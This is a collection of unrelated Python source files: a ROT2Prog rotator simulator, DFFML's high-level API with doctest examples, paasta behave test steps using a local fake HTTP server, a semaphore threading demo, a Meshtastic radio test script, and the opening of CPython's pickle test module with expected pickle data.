min_el (int, optional): Minimum elevation. Defaults to -21.
max_el (int, optional): Maximum elevation. Defaults to 180.
"""
with self._limits_lock:
self._min_az = min_az
self._max_az = max_az
self._min_el = min_el
self._max_el = max_el
def get_pulses_per_degree(self):
"""Returns the number of pulses per degree.
Returns:
int: Pulses per degree defining the resolution of the controller.
"""
with self._pulses_per_degree_lock:
return self._pulses_per_degree
class ROT2ProgSim:
"""Receives commands and sends responses to simulate the ROT2Prog controller.
"""
_log = None
_ser = None
_retry = 5
_keep_running = True
_az = 0
_el = 0
_pulses_per_degree = 0
def __init__(self, port, pulses_per_degree):
"""Creates object, opens serial connection, and starts daemon thread to run simulator..
Args:
port (str): Name of serial port to connect to.
pulses_per_degree (int): Resolution of simulated ROT2Prog controller. Options are 1, 2, and 4.
"""
self._log = logging.getLogger(__name__)
# open serial port
self._ser = serial.Serial(
port = port,
baudrate = 600,
bytesize = 8,
parity = 'N',
stopbits = 1,
timeout = None,
inter_byte_timeout = 0.1) # inter_byte_timeout allows continued operation after a bad packet
self._pulses_per_degree = int(pulses_per_degree)
self._log.info('ROT2Prog simulation interface opened on ' + str(self._ser.name))
# start daemon thread to communicate on serial port
Thread(target = self._run, daemon = True).start()
def _run(self):
"""Receives command packets, parses them to update the state of the simulator, and sends response packets when necessary.
"""
while self._keep_running:
command_packet = list(self._ser.read(13))
self._log.debug('Command packet received: ' + str(list(map(hex, list(command_packet)))))
if len(command_packet) != 13:
self._log.critical('Incomplete command packet')
else:
K = command_packet[11]
if K in [0x0F, 0x1F]:
if K == 0x0F:
self._log.debug('Stop command received')
elif K == 0x1F:
self._log.debug('Status command received')
# convert to byte values
H = "00000" + str(round(float(self._az + 360), 1))
V = "00000" + str(round(float(self._el + 360), 1))
response_packet = [
0x57,
int(H[-5]), int(H[-4]), int(H[-3]), int(H[-1]),
self._pulses_per_degree,
int(V[-5]), int(V[-4]), int(V[-3]), int(V[-1]),
self._pulses_per_degree,
0x20]
self._log.debug('Response queued')
self._log.debug('-> Azimuth: ' + str(self._az) + '°')
self._log.debug('-> Elevation: ' + str(self._el) + '°')
self._log.debug('-> PH: ' + hex(self._pulses_per_degree))
self._log.debug('-> PV: ' + hex(self._pulses_per_degree))
self._ser.write(bytearray(response_packet))
self._log.debug('Response packet sent: ' + str(list(map(hex, list(response_packet)))))
elif K == 0x2F:
# convert from ascii characters
H = ((command_packet[1] - 0x30) * 1000) + ((command_packet[2] - 0x30) * 100) + ((command_packet[3] - 0x30) * 10) + (command_packet[4] - 0x30)
V = ((command_packet[6] - 0x30) * 1000) + ((command_packet[7] - 0x30) * 100) + ((command_packet[8] - 0x30) * 10) + (command_packet[9] - 0x30)
# decode with resolution
self._az = H/self._pulses_per_degree - 360.0
self._el = V/self._pulses_per_degree - 360.0
self._az = float(round(self._az, 1))
self._el = float(round(self._el, 1))
self._log.debug('Set command received')
self._log.debug('-> Azimuth: ' + str(self._az) + '°')
self._log.debug('-> Elevation: ' + str(self._el) + '°')
else:
self._log.error('Invalid command received (K = ' + str(hex(K)) + ')')
def stop(self):
"""Stops the daemon thread running the simulator.
"""
self._keep_running = False
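# --- Example usage (a minimal sketch, not part of the library) ---
# The port names below are hypothetical. On Linux a linked pair of virtual
# serial ports can be created with e.g. `socat -d -d pty,raw,echo=0 pty,raw,echo=0`
# and the two resulting /dev/pts/* paths substituted here; with real hardware
# only the ROT2Prog half is needed.
if __name__ == '__main__':
	logging.basicConfig(level=logging.DEBUG)
	sim = ROT2ProgSim('/dev/pts/3', pulses_per_degree=2)  # simulated controller end
	rot = ROT2Prog('/dev/pts/4')  # client end
	print('Current position:', rot.status())
	rot.set(120.0, 45.0)  # command the rotator to az=120°, el=45°
	time.sleep(1)
	print('Position after set:', rot.status())
	rot.stop()
	sim.stop()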
|
high_level.py
|
"""
High level abstraction interfaces to DFFML. These are probably going to be used
in a lot of quick and dirty python files.
"""
import asyncio
import pathlib
from typing import Optional, Tuple, List, Union, Dict, Any, AsyncIterator
from .record import Record
from .df.types import DataFlow, Input
from .df.memory import MemoryOrchestrator
from .source.source import Sources, BaseSource
from .source.memory import MemorySource, MemorySourceConfig
from .df.base import BaseInputSetContext, BaseOrchestrator, BaseInputSet
def _records_to_sources(*args):
"""
Create a memory source out of any records passed as a variable length list.
Add all sources found in the variable length list to a list of sources, and
the created source containing records, and return that list of sources.
"""
# If the first arg is an instance of sources, append the rest to that.
if args and isinstance(args[0], Sources):
sources = args[0]
else:
sources = Sources(
*[arg for arg in args if isinstance(arg, BaseSource)]
)
# Records to add to memory source
records = []
# Make args mutable
args = list(args)
# Convert dicts to records
for i, arg in enumerate(args):
if isinstance(arg, dict):
arg = Record(i, data={"features": arg})
if isinstance(arg, Record):
records.append(arg)
if isinstance(arg, str) and "." in arg:
filepath = pathlib.Path(arg)
source = BaseSource.load(filepath.suffix.replace(".", ""))
sources.append(source(filename=arg))
# Create memory source if there are any records
if records:
sources.append(MemorySource(MemorySourceConfig(records=records)))
return sources
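# For example (a hypothetical sketch of the conversions above):
#   _records_to_sources(Record("r1", data={"features": {"A": 1}}), "data.csv")
# returns a Sources containing a CSV-backed source loaded via the ".csv"
# extension and a MemorySource holding the Record.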
async def run(
dataflow: DataFlow,
*input_sets: Union[List[Input], BaseInputSet],
orchestrator: Optional[BaseOrchestrator] = None,
strict: bool = True,
ctx: Optional[BaseInputSetContext] = None,
halt: Optional[asyncio.Event] = None,
) -> AsyncIterator[Tuple[BaseInputSetContext, Dict[str, Any]]]:
"""
Run a DataFlow
Run a DataFlow using the default orchestrator
(:py:class:`MemoryOrchestrator <dffml.df.memory.MemoryOrchestrator>`),
or the specified one.
Parameters
----------
dataflow : DataFlow
:py:class:`DataFlow <dffml.df.types.DataFlow>` to run.
input_sets : InputSet, list, dict, optional
:py:class:`Inputs <dffml.df.types.Input>` to give to the
:py:class:`DataFlow <dffml.df.types.DataFlow>` when it starts. Can be in
multiple formats.
If each element is a ``list`` then it's expected that each element of
that list be an :py:class:`Input <dffml.df.types.Input>`, in this case
an :py:class:`InputSet <dffml.df.base.BaseInputSet>` will be created
with a random string used as the
:py:class:`StringInputSetContext <dffml.df.base.StringInputSetContext>`.
If a ``dict`` is given then each key will become a
:py:class:`StringInputSetContext <dffml.df.base.StringInputSetContext>`.
The value for each key should be a ``list`` of
:py:class:`Input <dffml.df.types.Input>` objects.
If each element is a :py:class:`InputSet <dffml.df.base.BaseInputSet>`
then each context
:py:class:`InputSetContext <dffml.df.base.BaseInputSetContext>`
will have its respective :py:class:`Inputs <dffml.df.types.Input>` added
to it.
orchestrator : BaseOrchestrator, optional
Orchestrator to use, defaults to
:py:class:`MemoryOrchestrator <dffml.df.memory.MemoryOrchestrator>`
if ``None``.
strict : bool, optional
If true (default), raise exceptions when they occur in operations. If
false, log exceptions without raising.
ctx : BaseInputSetContext, optional
If given and input_sets is a ``list`` then add inputs under the given
context. Otherwise they are added under randomly generated contexts.
halt : Event, optional
If given, keep the dataflow running until this :py:class:`asyncio.Event`
is set.
Returns
-------
asynciterator
``tuple`` of
:py:class:`InputSetContext <dffml.df.base.BaseInputSetContext>`
and ``dict`` where contents are determined by output operations.
If multiple output operations are used, then the top level keys will be
the names of the output operations. If only one is used, then the
``dict`` will be whatever the return value of that output operation was.
Examples
--------
The following creates a TCP echo server. We write an operation which, when run
via a DataFlow, opens a connection and sends a message to the server.
For the inputs to the DataFlow, we create 2 Input objects whose values are
the message to be sent to the TCP server. We also create Input objects for
the host and port. When running a DataFlow, operations will be run with each
possible permutation of their inputs.
.. TODO Autogenerate this image during docs build
graph LR
send_to_server
1[First echo message]
port[Port]
host[Host]
2[Second echo message]
1_c[Host, Port, First echo]
2_c[Host, Port, Second echo]
host --> 1_c
port --> 1_c
2 --> 2_c
port --> 2_c
host --> 2_c
1 --> 1_c
1_c --> send_to_server
2_c --> send_to_server
.. image:: /images/high_level_run_echo_server_input_combination.svg
:alt: Flow chart showing how both echo messages create a parameter set including that echo message and the host and port
Because there is a different Input object for each of the 2 "echo" messages,
one will get combined with the host and port to make an argument list for
the ``send_to_server`` operation. The other also combines with the host and
port to make another argument list. Both argument lists are used to call the
``send_to_server`` operation.
>>> # Socket server derived from
>>> # https://docs.python.org/3/library/socketserver.html#asynchronous-mixins
>>> import asyncio
>>> import threading
>>> import socketserver
>>> from dffml import *
>>>
>>> class ThreadedTCPRequestHandler(socketserver.BaseRequestHandler):
... def handle(self):
... self.request.sendall(self.request.recv(1024))
>>>
>>> class ThreadedTCPServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
... pass
>>>
>>> @op
... async def send_to_server(host: str, port: int, message: str):
... reader, writer = await asyncio.open_connection(host, port)
...
... writer.write(message.encode())
... await writer.drain()
...
... data = await reader.read(100)
... print(f"Client sent {message!r}, got: {data.decode()!r}")
...
... writer.close()
... await writer.wait_closed()
>>>
>>> # List of messages to send to the server, 2 long, each value is "echo"
>>> messages = [Input(value="echo", definition=send_to_server.op.inputs["message"])
... for _ in range(0, 2)]
>>>
>>> # DataFlow consisting of the single operation
>>> dataflow = DataFlow.auto(send_to_server)
>>>
>>> async def main():
...         # Create a server, passing 0 to get a random port assigned
... server = ThreadedTCPServer(("127.0.0.1", 0), ThreadedTCPRequestHandler)
... with server:
... host, port = server.server_address
...
... # Start a thread to run the server in the background
... server_thread = threading.Thread(target=server.serve_forever)
... # Exit the server thread when the main thread terminates
... server_thread.daemon = True
... server_thread.start()
...
... # Add the host and port to the list of Inputs for the DataFlow
... inputs = messages + [
... Input(value=host, definition=send_to_server.op.inputs["host"]),
... Input(value=port, definition=send_to_server.op.inputs["port"])
... ]
...
... try:
... async for ctx, results in run(dataflow, inputs):
... pass
... finally:
... server.shutdown()
>>>
>>> asyncio.run(main())
Client sent 'echo', got: 'echo'
Client sent 'echo', got: 'echo'
"""
if orchestrator is None:
orchestrator = MemoryOrchestrator.withconfig({})
async with orchestrator:
async with orchestrator(dataflow) as ctx:
async for ctx, results in ctx.run(*input_sets):
yield ctx, results
async def save(source: BaseSource, *args: Record) -> None:
"""
Update a source's knowledge about given records.
For each record given, call
:py:func:`update <dffml.source.source.BaseSourceContext.update>` on the
source. Effectively saving all the records to the source.
Parameters
----------
source : BaseSource
Data source to use. See :doc:`/plugins/dffml_source` for sources and
options.
*args : list
Records to be saved.
Examples
--------
>>> import asyncio
>>> import pathlib
>>> from dffml import *
>>>
>>> source = CSVSource(filename="save.csv", allowempty=True, readwrite=True)
>>>
>>> async def main():
... await save(
... source,
... Record(
... "myrecord",
... data={
... "features": {"Years": 0, "Expertise": 1, "Trust": 0.1},
... "prediction": {"Salary": {"value": 10, "confidence": 1.0}},
... }
... )
... )
... print(pathlib.Path("save.csv").read_text().strip())
>>>
>>> asyncio.run(main())
key,tag,Expertise,Trust,Years,prediction_Salary,confidence_Salary
myrecord,untagged,1,0.1,0,10,1.0
"""
async with source:
async with source() as sctx:
for record in args:
await sctx.update(record)
async def load(source: BaseSource, *args: str) -> AsyncIterator[Record]:
"""
Yields records from a source.
Yields all the records from the source, if record keys are given then only
those records are yielded.
Parameters
----------
source : BaseSource
Data source to use. See :doc:`/plugins/dffml_source` for sources and
options.
*args : str
Records to be returned. If empty, all the records in a source will be returned.
Returns
-------
asynciterator
:py:class:`Record <dffml.record.Record>` object
Examples
--------
>>> import asyncio
>>> from dffml import *
>>>
>>> source = CSVSource(filename="load.csv", allowempty=True, readwrite=True)
>>>
>>> async def main():
... await save(
... source,
... Record("1", data={"features": {"A": 0, "B": 1}}),
... Record("2", data={"features": {"A": 3, "B": 4}}),
... )
...
... # All records in source
... async for record in load(source):
... print(record.export())
...
... # For specific records in a source
... async for record in load(source, "1"):
... print(record.export())
>>>
>>> asyncio.run(main())
{'key': '1', 'features': {'A': 0, 'B': 1}, 'extra': {}}
{'key': '2', 'features': {'A': 3, 'B': 4}, 'extra': {}}
{'key': '1', 'features': {'A': 0, 'B': 1}, 'extra': {}}
"""
async with source:
async with source() as sctx:
if args:
# If specific records are to be loaded
for record in args:
yield await sctx.record(record)
else:
# All the records are loaded
async for record in sctx.records():
yield record
async def train(model, *args: Union[BaseSource, Record, Dict[str, Any]]):
"""
Train a machine learning model.
Provide records to the model to train it. The model should be already
instantiated.
Parameters
----------
model : Model
Machine Learning model to use. See :doc:`/plugins/dffml_model` for
models options.
*args : list
Input data for training. Could be a ``dict``, :py:class:`Record`,
filename, one of the data :doc:`/plugins/dffml_source`, or a filename
with the extension being one of the data sources.
Examples
--------
>>> import asyncio
>>> from dffml import *
>>>
>>> model = SLRModel(
... features=Features(
... DefFeature("Years", int, 1),
... ),
... predict=DefFeature("Salary", int, 1),
... )
>>>
>>> async def main():
... await train(
... model,
... {"Years": 0, "Salary": 10},
... {"Years": 1, "Salary": 20},
... {"Years": 2, "Salary": 30},
... {"Years": 3, "Salary": 40},
... )
>>>
>>> asyncio.run(main())
"""
sources = _records_to_sources(*args)
async with sources as sources, model as model:
async with sources() as sctx, model() as mctx:
return await mctx.train(sctx)
async def accuracy(
model, *args: Union[BaseSource, Record, Dict[str, Any]]
) -> float:
"""
Assess the accuracy of a machine learning model.
Provide records to the model to assess the percent accuracy of its
prediction abilities. The model should be already instantiated and trained.
Parameters
----------
model : Model
Machine Learning model to use. See :doc:`/plugins/dffml_model` for
models options.
*args : list
Input data for assessing accuracy. Could be a ``dict``, :py:class:`Record`,
filename, one of the data :doc:`/plugins/dffml_source`, or a filename
with the extension being one of the data sources.
Returns
-------
float
A decimal value representing the percent of the time the model made the
correct prediction. For some models this has another meaning. Please see
the documentation for the model you're using for further details.
Examples
--------
>>> import asyncio
>>> from dffml import *
>>>
>>> model = SLRModel(
... features=Features(
... DefFeature("Years", int, 1),
... ),
... predict=DefFeature("Salary", int, 1),
... )
>>>
>>> async def main():
... print(
... "Accuracy:",
... await accuracy(
... model,
... {"Years": 4, "Salary": 50},
... {"Years": 5, "Salary": 60},
... ),
... )
>>>
>>> asyncio.run(main())
Accuracy: 1.0
"""
sources = _records_to_sources(*args)
async with sources as sources, model as model:
async with sources() as sctx, model() as mctx:
return float(await mctx.accuracy(sctx))
async def predict(
model,
*args: Union[BaseSource, Record, Dict[str, Any]],
update: bool = False,
keep_record: bool = False,
):
"""
Make a prediction using a machine learning model.
The model must be trained before using it to make a prediction.
Parameters
----------
model : Model
Machine Learning model to use. See :doc:`/plugins/dffml_model` for
models options.
*args : list
Input data for prediction. Could be a ``dict``, :py:class:`Record`,
filename, or one of the data :doc:`/plugins/dffml_source`.
update : boolean, optional
If ``True`` prediction data within records will be written back to all
sources given. Defaults to ``False``.
keep_record : boolean, optional
If ``True`` the results will be kept as their ``Record`` objects instead
of being converted to a ``(record.key, features, predictions)`` tuple.
Defaults to ``False``.
Returns
-------
asynciterator
``Record`` objects or ``(record.key, features, predictions)`` tuple.
Examples
--------
>>> import asyncio
>>> from dffml import *
>>>
>>> model = SLRModel(
... features=Features(
... DefFeature("Years", int, 1),
... ),
... predict=DefFeature("Salary", int, 1),
... )
>>>
>>> async def main():
... async for i, features, prediction in predict(
... model,
... {"Years": 6},
... {"Years": 7},
... ):
... features["Salary"] = round(prediction["Salary"]["value"])
... print(features)
>>>
>>> asyncio.run(main())
{'Years': 6, 'Salary': 70}
{'Years': 7, 'Salary': 80}
"""
sources = _records_to_sources(*args)
async with sources as sources, model as model:
async with sources() as sctx, model() as mctx:
async for record in mctx.predict(sctx.records()):
yield record if keep_record else (
record.key,
record.features(),
record.predictions(),
)
if update:
await sctx.update(record)
|
http_drain_method_steps.py
|
# Copyright 2015-2016 Yelp Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import asyncio
import http.server
import threading
from typing import List
import mock
from behave import given
from behave import then
from behave import when
from paasta_tools import drain_lib
from paasta_tools.utils import paasta_print
@given('a fake HTTP server')
def make_fake_http_server(context):
context.fake_http_server = FakeHTTPServer()
context.fake_http_server.start()
@given('a HTTPDrainMethod configured to point at that server')
def make_http_drain_method(context):
context.http_drain_method = drain_lib.HTTPDrainMethod(
service='fake_service',
instance='fake_instance',
registrations=['fake_nerve_ns'],
drain={
"url_format": "http://localhost:%d/drain" % context.fake_http_server.server.server_port,
"success_codes": "200",
},
stop_draining={},
is_draining={
"url_format": "http://localhost:%d/is_draining" % context.fake_http_server.server.server_port,
"success_codes": "200",
},
is_safe_to_kill={},
)
@when('we call {method}() and get status code {status_code:d}')
def call_drain(context, method, status_code):
fake_task = mock.Mock(host="fake_host", ports=[654321])
FakeHTTPRequestHandler.status_code = status_code
func = {
'drain': context.http_drain_method.drain,
'is_draining': context.http_drain_method.is_draining,
}[method]
context.retval = asyncio.get_event_loop().run_until_complete(func(fake_task))
@then('the server should see a request to {path}')
def check_http_server(context, path):
assert context.fake_http_server.paths == [path]
@then('the return value should be {expected_retval}')
def check_retval(context, expected_retval):
assert repr(context.retval) == expected_retval
class FakeHTTPServer:
paths: List[str] = []
def start(self):
self.server = http.server.HTTPServer(("localhost", 0), FakeHTTPRequestHandler)
self.server_thread = threading.Thread(target=self.serve)
self.server_thread.daemon = True
self.server_thread.start()
def serve(self):
self.server.serve_forever()
def shutdown(self):
FakeHTTPServer.paths = []
self.server.shutdown()
self.server_thread.join()
class FakeHTTPRequestHandler(http.server.BaseHTTPRequestHandler):
status_code = 200
def do_GET(self):
paasta_print("Got GET for %s" % self.path)
try:
FakeHTTPServer.paths.append(self.path)
self.send_response(self.status_code)
self.end_headers()
except Exception as e:
paasta_print(e)
|
Semaphore.py
|
import logging
import threading
import time
import random
LOG_FORMAT = '%(asctime)s %(threadName)-17s %(levelname)-8s %(message)s'
logging.basicConfig(level=logging.INFO, format=LOG_FORMAT)
semaphore = threading.Semaphore(0)
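# The semaphore starts at 0, so consumer() blocks in acquire() until producer()
# has stored a value in `item` and called release(); this guarantees the
# consumer never reads `item` before it has been set.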
item = 0
def consumer():
global item
logging.info('Consumer is waiting')
semaphore.acquire()
logging.info('Consumer notify: item number {}'.format(item))
def producer():
global item
item = random.randint(0, 1000)
print('item has been set')
logging.info('Producer notify: item number {}'.format(item))
semaphore.release()
def main():
for i in range(10):
t1 = threading.Thread(target=consumer)
t2 = threading.Thread(target=producer)
t1.start()
t2.start()
t1.join()
t2.join()
if __name__ == "__main__":
main()
|
test.py
|
import logging
from . import util
from . import SerialInterface, BROADCAST_NUM
from pubsub import pub
import time
import sys
import threading
from dotmap import DotMap
"""The interfaces we are using for our tests"""
interfaces = None
"""A list of all packets we received while the current test was running"""
receivedPackets = None
testsRunning = False
testNumber = 0
def onReceive(packet, interface):
"""Callback invoked when a packet arrives"""
print(f"From {interface.devPath}: {packet}")
p = DotMap(packet)
if p.decoded.data.typ == "CLEAR_TEXT":
# We only care about clear text packets
receivedPackets.append(p)
def onNode(node):
"""Callback invoked when the node DB changes"""
print(f"Node changed: {node}")
def subscribe():
"""Subscribe to the topics the user probably wants to see, prints output to stdout"""
pub.subscribe(onNode, "meshtastic.node")
def testSend(fromInterface, toInterface, isBroadcast=False, asBinary=False):
"""
Sends one test packet between two nodes and then returns success or failure
Arguments:
fromInterface {SerialInterface} -- interface to send the test packet from
toInterface {SerialInterface} -- interface expected to receive the test packet
Returns:
boolean -- True for success
"""
global receivedPackets
receivedPackets = []
fromNode = fromInterface.myInfo.my_node_num
if isBroadcast:
toNode = BROADCAST_NUM
else:
toNode = toInterface.myInfo.my_node_num
logging.info(f"Sending test packet from {fromNode} to {toNode}")
wantAck = True
if not asBinary:
fromInterface.sendText(f"Test {testNumber}", toNode, wantAck=wantAck)
else:
fromInterface.sendData((f"Binary {testNumber}").encode(
"utf-8"), toNode, wantAck=wantAck)
time.sleep(45)
return (len(receivedPackets) >= 1)
def testThread(numTests=50):
logging.info("Found devices, starting tests...")
numFail = 0
numSuccess = 0
for i in range(numTests):
global testNumber
testNumber = testNumber + 1
isBroadcast = True
success = testSend(
interfaces[0], interfaces[1], isBroadcast, asBinary=(i % 2 == 0))
if not success:
numFail = numFail + 1
logging.error(
f"Test failed, expected packet not received ({numFail} failures so far)")
else:
numSuccess = numSuccess + 1
logging.info(f"Test succeeded ({numSuccess} successes so far)")
if numFail >= 3:
for i in interfaces:
i.close()
return
time.sleep(1)
def onConnection(topic=pub.AUTO_TOPIC):
"""Callback invoked when we connect/disconnect from a radio"""
print(f"Connection changed: {topic.getName()}")
global testsRunning
global interfaces
if (all(iface.isConnected for iface in interfaces) and not testsRunning):
testsRunning = True
t = threading.Thread(target=testThread, args=())
t.start()
def openDebugLog(portName):
debugname = "log" + portName.replace("/", "_")
logging.info(f"Writing serial debugging to {debugname}")
return open(debugname, 'w+', buffering=1)
def testAll():
"""
Run a series of tests using devices we can find.
Raises:
Exception: If not enough devices are found
"""
ports = util.findPorts()
if (len(ports) < 2):
raise Exception("Must have at least two devices connected to USB")
pub.subscribe(onConnection, "meshtastic.connection")
pub.subscribe(onReceive, "meshtastic.receive")
global interfaces
interfaces = list(map(lambda port: SerialInterface(
port, debugOut=openDebugLog(port), connectNow=False), ports))
for i in interfaces:
i.connect()
logging.info("Ports opened, waiting for device to complete connection")
|
pickletester.py
|
import collections
import copyreg
import dbm
import io
import functools
import os
import math
import pickle
import pickletools
import shutil
import struct
import sys
import threading
import unittest
import weakref
from textwrap import dedent
from http.cookies import SimpleCookie
try:
import _testbuffer
except ImportError:
_testbuffer = None
try:
import numpy as np
except ImportError:
np = None
from test import support
from test.support import (
TestFailed, TESTFN, run_with_locale, no_tracing,
_2G, _4G, bigmemtest, reap_threads, forget,
)
from pickle import bytes_types
requires_32b = unittest.skipUnless(sys.maxsize < 2**32,
"test is only meaningful on 32-bit builds")
# Tests that try a number of pickle protocols should have a
# for proto in protocols:
# kind of outer loop.
protocols = range(pickle.HIGHEST_PROTOCOL + 1)
# Return True if opcode code appears in the pickle, else False.
def opcode_in_pickle(code, pickle):
for op, dummy, dummy in pickletools.genops(pickle):
if op.code == code.decode("latin-1"):
return True
return False
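# For example, opcode_in_pickle(pickle.PROTO, pickle.dumps(42, 2)) is True,
# since protocol-2 pickles begin with the PROTO opcode.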
# Return the number of times opcode code appears in pickle.
def count_opcode(code, pickle):
n = 0
for op, dummy, dummy in pickletools.genops(pickle):
if op.code == code.decode("latin-1"):
n += 1
return n
class UnseekableIO(io.BytesIO):
def peek(self, *args):
raise NotImplementedError
def seekable(self):
return False
def seek(self, *args):
raise io.UnsupportedOperation
def tell(self):
raise io.UnsupportedOperation
# We can't very well test the extension registry without putting known stuff
# in it, but we have to be careful to restore its original state. Code
# should do this:
#
# e = ExtensionSaver(extension_code)
# try:
# fiddle w/ the extension registry's stuff for extension_code
# finally:
# e.restore()
class ExtensionSaver:
# Remember current registration for code (if any), and remove it (if
# there is one).
def __init__(self, code):
self.code = code
if code in copyreg._inverted_registry:
self.pair = copyreg._inverted_registry[code]
copyreg.remove_extension(self.pair[0], self.pair[1], code)
else:
self.pair = None
# Restore previous registration for code.
def restore(self):
code = self.code
curpair = copyreg._inverted_registry.get(code)
if curpair is not None:
copyreg.remove_extension(curpair[0], curpair[1], code)
pair = self.pair
if pair is not None:
copyreg.add_extension(pair[0], pair[1], code)
class C:
def __eq__(self, other):
return self.__dict__ == other.__dict__
class D(C):
def __init__(self, arg):
pass
class E(C):
def __getinitargs__(self):
return ()
class H(object):
pass
# Hashable mutable key
class K(object):
def __init__(self, value):
self.value = value
def __reduce__(self):
# Shouldn't support the recursion itself
return K, (self.value,)
import __main__
__main__.C = C
C.__module__ = "__main__"
__main__.D = D
D.__module__ = "__main__"
__main__.E = E
E.__module__ = "__main__"
__main__.H = H
H.__module__ = "__main__"
__main__.K = K
K.__module__ = "__main__"
class myint(int):
def __init__(self, x):
self.str = str(x)
class initarg(C):
def __init__(self, a, b):
self.a = a
self.b = b
def __getinitargs__(self):
return self.a, self.b
class metaclass(type):
pass
class use_metaclass(object, metaclass=metaclass):
pass
class pickling_metaclass(type):
def __eq__(self, other):
return (type(self) == type(other) and
self.reduce_args == other.reduce_args)
def __reduce__(self):
return (create_dynamic_class, self.reduce_args)
def create_dynamic_class(name, bases):
result = pickling_metaclass(name, bases, dict())
result.reduce_args = (name, bases)
return result
class ZeroCopyBytes(bytes):
readonly = True
c_contiguous = True
f_contiguous = True
zero_copy_reconstruct = True
def __reduce_ex__(self, protocol):
if protocol >= 5:
return type(self)._reconstruct, (pickle.PickleBuffer(self),), None
else:
return type(self)._reconstruct, (bytes(self),)
def __repr__(self):
return "{}({!r})".format(self.__class__.__name__, bytes(self))
__str__ = __repr__
@classmethod
def _reconstruct(cls, obj):
with memoryview(obj) as m:
obj = m.obj
if type(obj) is cls:
# Zero-copy
return obj
else:
return cls(obj)
class ZeroCopyBytearray(bytearray):
readonly = False
c_contiguous = True
f_contiguous = True
zero_copy_reconstruct = True
def __reduce_ex__(self, protocol):
if protocol >= 5:
return type(self)._reconstruct, (pickle.PickleBuffer(self),), None
else:
return type(self)._reconstruct, (bytes(self),)
def __repr__(self):
return "{}({!r})".format(self.__class__.__name__, bytes(self))
__str__ = __repr__
@classmethod
def _reconstruct(cls, obj):
with memoryview(obj) as m:
obj = m.obj
if type(obj) is cls:
# Zero-copy
return obj
else:
return cls(obj)
if _testbuffer is not None:
class PicklableNDArray:
# A not-really-zero-copy picklable ndarray, as the ndarray()
# constructor doesn't allow for it
zero_copy_reconstruct = False
def __init__(self, *args, **kwargs):
self.array = _testbuffer.ndarray(*args, **kwargs)
def __getitem__(self, idx):
cls = type(self)
new = cls.__new__(cls)
new.array = self.array[idx]
return new
@property
def readonly(self):
return self.array.readonly
@property
def c_contiguous(self):
return self.array.c_contiguous
@property
def f_contiguous(self):
return self.array.f_contiguous
def __eq__(self, other):
if not isinstance(other, PicklableNDArray):
return NotImplemented
return (other.array.format == self.array.format and
other.array.shape == self.array.shape and
other.array.strides == self.array.strides and
other.array.readonly == self.array.readonly and
other.array.tobytes() == self.array.tobytes())
def __ne__(self, other):
if not isinstance(other, PicklableNDArray):
return NotImplemented
return not (self == other)
def __repr__(self):
return (f"{type(self)}(shape={self.array.shape},"
f"strides={self.array.strides}, "
f"bytes={self.array.tobytes()})")
def __reduce_ex__(self, protocol):
if not self.array.contiguous:
raise NotImplementedError("Reconstructing a non-contiguous "
"ndarray does not seem possible")
ndarray_kwargs = {"shape": self.array.shape,
"strides": self.array.strides,
"format": self.array.format,
"flags": (0 if self.readonly
else _testbuffer.ND_WRITABLE)}
pb = pickle.PickleBuffer(self.array)
if protocol >= 5:
return (type(self)._reconstruct,
(pb, ndarray_kwargs))
else:
# Need to serialize the bytes in physical order
with pb.raw() as m:
return (type(self)._reconstruct,
(m.tobytes(), ndarray_kwargs))
@classmethod
def _reconstruct(cls, obj, kwargs):
with memoryview(obj) as m:
# For some reason, ndarray() wants a list of integers...
# XXX This only works if format == 'B'
items = list(m.tobytes())
return cls(items, **kwargs)
# DATA0 .. DATA4 are the pickles we expect under the various protocols, for
# the object returned by create_data().
DATA0 = (
b'(lp0\nL0L\naL1L\naF2.0\n'
b'ac__builtin__\ncomple'
b'x\np1\n(F3.0\nF0.0\ntp2\n'
b'Rp3\naL1L\naL-1L\naL255'
b'L\naL-255L\naL-256L\naL'
b'65535L\naL-65535L\naL-'
b'65536L\naL2147483647L'
b'\naL-2147483647L\naL-2'
b'147483648L\na(Vabc\np4'
b'\ng4\nccopy_reg\n_recon'
b'structor\np5\n(c__main'
b'__\nC\np6\nc__builtin__'
b'\nobject\np7\nNtp8\nRp9\n'
b'(dp10\nVfoo\np11\nL1L\ns'
b'Vbar\np12\nL2L\nsbg9\ntp'
b'13\nag13\naL5L\na.'
)
# Disassembly of DATA0
DATA0_DIS = """\
0: ( MARK
1: l LIST (MARK at 0)
2: p PUT 0
5: L LONG 0
9: a APPEND
10: L LONG 1
14: a APPEND
15: F FLOAT 2.0
20: a APPEND
21: c GLOBAL '__builtin__ complex'
42: p PUT 1
45: ( MARK
46: F FLOAT 3.0
51: F FLOAT 0.0
56: t TUPLE (MARK at 45)
57: p PUT 2
60: R REDUCE
61: p PUT 3
64: a APPEND
65: L LONG 1
69: a APPEND
70: L LONG -1
75: a APPEND
76: L LONG 255
82: a APPEND
83: L LONG -255
90: a APPEND
91: L LONG -256
98: a APPEND
99: L LONG 65535
107: a APPEND
108: L LONG -65535
117: a APPEND
118: L LONG -65536
127: a APPEND
128: L LONG 2147483647
141: a APPEND
142: L LONG -2147483647
156: a APPEND
157: L LONG -2147483648
171: a APPEND
172: ( MARK
173: V UNICODE 'abc'
178: p PUT 4
181: g GET 4
184: c GLOBAL 'copy_reg _reconstructor'
209: p PUT 5
212: ( MARK
213: c GLOBAL '__main__ C'
225: p PUT 6
228: c GLOBAL '__builtin__ object'
248: p PUT 7
251: N NONE
252: t TUPLE (MARK at 212)
253: p PUT 8
256: R REDUCE
257: p PUT 9
260: ( MARK
261: d DICT (MARK at 260)
262: p PUT 10
266: V UNICODE 'foo'
271: p PUT 11
275: L LONG 1
279: s SETITEM
280: V UNICODE 'bar'
285: p PUT 12
289: L LONG 2
293: s SETITEM
294: b BUILD
295: g GET 9
298: t TUPLE (MARK at 172)
299: p PUT 13
303: a APPEND
304: g GET 13
308: a APPEND
309: L LONG 5
313: a APPEND
314: . STOP
highest protocol among opcodes = 0
"""
DATA1 = (
b']q\x00(K\x00K\x01G@\x00\x00\x00\x00\x00\x00\x00c__'
b'builtin__\ncomplex\nq\x01'
